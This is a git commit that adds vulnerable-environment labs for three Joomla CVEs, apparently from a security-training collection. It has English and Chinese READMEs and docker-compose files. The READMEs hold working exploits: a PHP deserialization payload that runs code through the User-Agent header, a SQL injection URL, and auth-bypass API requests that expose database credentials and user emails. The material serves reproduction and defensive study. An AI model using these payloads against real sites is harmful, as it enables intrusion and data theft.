first commit

joomla/CVE-2015-8562/README.md

@@ -0,0 +1,82 @@
+# Joomla HTTP Header Unauthenticated Remote Code Execution (CVE-2015-8562)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Joomla is a free and open-source content management system (CMS) that allows users to build websites and online applications. It was first released in 2005 and has since become one of the most popular CMS platforms, powering millions of websites around the world.
+
+Joomla suffers from an unauthenticated remote code execution that affects all versions from 1.5.0 to 3.4.5. By storing user supplied headers in the databases session table it's possible to truncate the input by sending an 4-bytes UTF-8 character. The custom created payload is then executed once the session is read from the database. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13.
+
+References:
+
+- <https://packetstormsecurity.com/files/134949/Joomla-HTTP-Header-Unauthenticated-Remote-Code-Execution.html>
+- <https://www.leavesongs.com/PENETRATION/joomla-unserialize-code-execute-vulnerability.html>
+
+## Vulnerable Environment
+
+Executing following command to start a Joomla 3.4.5:
+
+```
+docker compose up -d
+```
+
+After the server is started, you can see the home page of it at `http://your-ip:8080`.
+
+## Exploit
+
+First of all, you need to send a request without User-Agent header and remember the Cookie in the response:
+
+![](2.png)
+
+Then use this script to generate a payload ([execute online](https://onlinephp.io/c/e824b)):
+
+```php
+<?php
+class JSimplepieFactory {
+}
+class JDatabaseDriverMysql {
+
+}
+class SimplePie {
+    var $sanitize;
+    var $cache;
+    var $cache_name_function;
+    var $javascript;
+    var $feed_url;
+    function __construct()
+    {
+        $this->feed_url = "phpinfo();JFactory::getConfig();exit;";
+        $this->javascript = 9999;
+        $this->cache_name_function = "assert";
+        $this->sanitize = new JDatabaseDriverMysql();
+        $this->cache = true;
+    }
+}
+
+class JDatabaseDriverMysqli {
+    protected $a;
+    protected $disconnectHandlers;
+    protected $connection;
+    function __construct()
+    {
+        $this->a = new JSimplepieFactory();
+        $x = new SimplePie();
+        $this->connection = 1;
+        $this->disconnectHandlers = [
+            [$x, "init"],
+        ];
+    }
+}
+
+$a = new JDatabaseDriverMysqli();
+$poc = serialize($a); 
+
+$poc = str_replace("\x00*\x00", '\\0\\0\\0', $poc);
+
+echo "123}__test|{$poc}\xF0\x9D\x8C\x86";
+```
+
+![](1.png)
+
+Put this craft payload into User-Agent header with Cookie obtained earlier then send request again. As you can see, our code `phpinfo()` is executed:
+
+![](3.png)

joomla/CVE-2015-8562/README.zh-cn.md

@@ -0,0 +1,86 @@
+# Joomla 3.4.5 反序列化漏洞（CVE-2015-8562）
+
+Joomla是一个开源免费的内容管理系统（CMS），基于PHP开发。
+
+本漏洞根源是PHP5.6.13前的版本在读取存储好的session时，如果反序列化出错则会跳过当前一段数据而去反序列化下一段数据。而Joomla将session存储在Mysql数据库中，编码是utf8，当我们插入4字节的utf8数据时则会导致截断。截断后的数据在反序列化时就会失败，最后触发反序列化漏洞。
+
+通过Joomla中的Gadget，可造成任意代码执行的结果。
+
+详情可参考：
+
+ - https://www.leavesongs.com/PENETRATION/joomla-unserialize-code-execute-vulnerability.html
+
+影响版本
+
+ - Joomla 1.5.x, 2.x, and 3.x before 3.4.6
+ - PHP 5.6 < 5.6.13, PHP 5.5 < 5.5.29 and PHP 5.4 < 5.4.45
+
+## 测试环境
+
+启动测试环境：
+
+```
+docker compose up -d
+```
+
+启动后访问`http://your-ip:8080/`即可看到Joomla的首页，包含测试数据。
+
+## 漏洞复现
+
+然后我们不带User-Agent头，先访问一次目标主页，记下服务端返回的Cookie：
+
+![](2.png)
+
+再用如下脚本生成POC：（[在线运行](https://onlinephp.io/c/e824b)）
+
+```php
+<?php
+class JSimplepieFactory {
+}
+class JDatabaseDriverMysql {
+
+}
+class SimplePie {
+    var $sanitize;
+    var $cache;
+    var $cache_name_function;
+    var $javascript;
+    var $feed_url;
+    function __construct()
+    {
+        $this->feed_url = "phpinfo();JFactory::getConfig();exit;";
+        $this->javascript = 9999;
+        $this->cache_name_function = "assert";
+        $this->sanitize = new JDatabaseDriverMysql();
+        $this->cache = true;
+    }
+}
+
+class JDatabaseDriverMysqli {
+    protected $a;
+    protected $disconnectHandlers;
+    protected $connection;
+    function __construct()
+    {
+        $this->a = new JSimplepieFactory();
+        $x = new SimplePie();
+        $this->connection = 1;
+        $this->disconnectHandlers = [
+            [$x, "init"],
+        ];
+    }
+}
+
+$a = new JDatabaseDriverMysqli();
+$poc = serialize($a); 
+
+$poc = str_replace("\x00*\x00", '\\0\\0\\0', $poc);
+
+echo "123}__test|{$poc}\xF0\x9D\x8C\x86";
+```
+
+![](1.png)
+
+将生成好的POC作为User-Agent，带上第一步获取的Cookie发包，这一次发包，脏数据进入Mysql数据库。然后同样的包再发一次，我们的代码被执行：
+
+![](3.png)

joomla/CVE-2015-8562/docker-compose.yml

@@ -0,0 +1,18 @@
+version: '2'
+services:
+ web:
+   image: vulhub/joomla:3.4.5
+   depends_on:
+    - mysql
+   environment: 
+    - JOOMLA_DB_HOST=mysql
+    - JOOMLA_DB_PORT=3306
+    - JOOMLA_DB_USER=root
+    - JOOMLA_DB_PASSWORD=vulhub
+    - JOOMLA_DB_NAME=joomla
+   ports:
+    - "8080:80"
+ mysql:
+   image: mysql:5.5
+   environment: 
+    - MYSQL_ROOT_PASSWORD=vulhub

joomla/CVE-2017-8917/README.md

@@ -0,0 +1,32 @@
+# Joomla 3.7.0 com_fields SQL Injection Vulnerability (CVE-2017-8917)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Joomla is a free and open-source content management system (CMS) that allows users to build websites and online applications. It was first released in 2005 and has since become one of the most popular CMS platforms, powering millions of websites around the world.
+
+An SQL injection vulnerability is caused by a new component, com_fields, which was introduced in version 3.7.
+
+References:
+
+- <https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html>
+- <https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html>
+
+## Vulnerable environment
+
+Executing following command to start a Joomla 3.4.5:
+
+```
+docker compose up -d
+```
+
+After the server is started, you can see the home page of it at `http://your-ip:8080`.
+
+## Exploit
+
+Visit following link directly to reproduce the SQL injection attack:
+
+```
+http://your-ip:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)
+```
+
+![](1.png)

joomla/CVE-2017-8917/README.zh-cn.md

@@ -0,0 +1,26 @@
+# Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境
+
+Joomla是一个开源免费的内容管理系统（CMS），基于PHP开发。
+
+Joomla在3.7.0中新引入的一个组件“com_fields”，这个组件任何人都可以访问，无需登陆验证。com_fields组件由于对请求数据过滤不严导致了SQL注入。
+
+参考链接：
+
+- <https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html>
+- <https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html>
+
+## 测试环境
+
+执行如下命令启动一个Joomla 3.7.0服务：
+
+```
+docker compose up -d
+```
+
+启动后访问`http://your-ip:8080`即可看到Joomla的安装界面和测试数据。
+
+## 漏洞复现
+
+直接访问`http://your-ip:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)`，即可看到SQL报错信息：
+
+![](1.png)

joomla/CVE-2017-8917/docker-compose.yml

@@ -0,0 +1,18 @@
+version: '2'
+services:
+ web:
+   image: vulhub/joomla:3.7.0
+   depends_on:
+    - mysql
+   environment: 
+    - JOOMLA_DB_HOST=mysql
+    - JOOMLA_DB_PORT=3306
+    - JOOMLA_DB_USER=root
+    - JOOMLA_DB_PASSWORD=vulhub
+    - JOOMLA_DB_NAME=joomla
+   ports:
+    - "8080:80"
+ mysql:
+   image: mysql:5.7
+   environment: 
+    - MYSQL_ROOT_PASSWORD=vulhub

joomla/CVE-2023-23752/README.md

@@ -0,0 +1,47 @@
+# Joomla improper access check in webservice endpoints (CVE-2023-23752)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Joomla is a free and open-source content management system (CMS) that allows users to build websites and online applications. It was first released in 2005 and has since become one of the most popular CMS platforms, powering millions of websites around the world.
+
+An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.
+
+References:
+
+- <https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html>
+- <https://xz.aliyun.com/t/12175>
+- <https://vulncheck.com/blog/joomla-for-rce>
+
+## Vulnerable Environment
+
+Execute following command to start a Joomla site 4.2.7:
+
+```
+docker compose up -d
+```
+
+You can access the Joomla website through `http://your-ip:8080` after the server is started.
+
+## Exploit
+
+This issue is caused by an attribute overwrite issue, the attacker can use `public=true` to bypass the authorization check.
+
+For example, expose all configuration including MySQL username and password through this link:
+
+```
+http://your-ip:8080/api/index.php/v1/config/application?public=true
+```
+
+![](1.png)
+
+Otherwise access is unauthorized without `public=true`：
+
+![](2.png)
+
+Expose all users information including emails through this link:
+
+```
+http://your-ip:8080/api/index.php/v1/users?public=true
+```
+
+![](3.png)

joomla/CVE-2023-23752/README.zh-cn.md

@@ -0,0 +1,45 @@
+# Joomla权限绕过漏洞（CVE-2023-23752）
+
+Joomla是一个开源免费的内容管理系统（CMS），基于PHP开发。
+
+在其4.0.0版本到4.2.7版本中，存在一处属性覆盖漏洞，导致攻击者可以通过恶意请求绕过权限检查，访问任意Rest API。
+
+参考链接：
+
+- <https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html>
+- <https://xz.aliyun.com/t/12175>
+- <https://vulncheck.com/blog/joomla-for-rce>
+
+## 漏洞环境
+
+执行如下命令启动一个Joomla 4.2.7：
+
+```
+docker compose up -d
+```
+
+服务启动后，访问`http://your-ip:8080`即可查看到Joomla页面。
+
+## 漏洞复现
+
+这个漏洞是由于错误的属性覆盖导致的，攻击者可以通过在访问Rest API时传入参数`public=true`来绕过权限校验。
+
+比如，访问下面这个链接即可读取所有配置项，包括数据库连接用户名和密码：
+
+```
+http://your-ip:8080/api/index.php/v1/config/application?public=true
+```
+
+![](1.png)
+
+如果不添加`public=true`，则访问会被拒绝：
+
+![](2.png)
+
+访问下面这个链接即可读取所有用户信息，包含邮箱等：
+
+```
+http://your-ip:8080/api/index.php/v1/users?public=true
+```
+
+![](3.png)

joomla/CVE-2023-23752/docker-compose.yml

@@ -0,0 +1,18 @@
+version: '2'
+services:
+ web:
+   image: vulhub/joomla:4.2.7
+   depends_on:
+    - mysql
+   environment: 
+    - JOOMLA_DB_HOST=mysql
+    - JOOMLA_DB_PORT=3306
+    - JOOMLA_DB_USER=root
+    - JOOMLA_DB_PASSWORD=vulhub
+    - JOOMLA_DB_NAME=joomla
+   ports:
+    - "8080:80"
+ mysql:
+   image: mysql:5.7
+   environment: 
+    - MYSQL_ROOT_PASSWORD=vulhub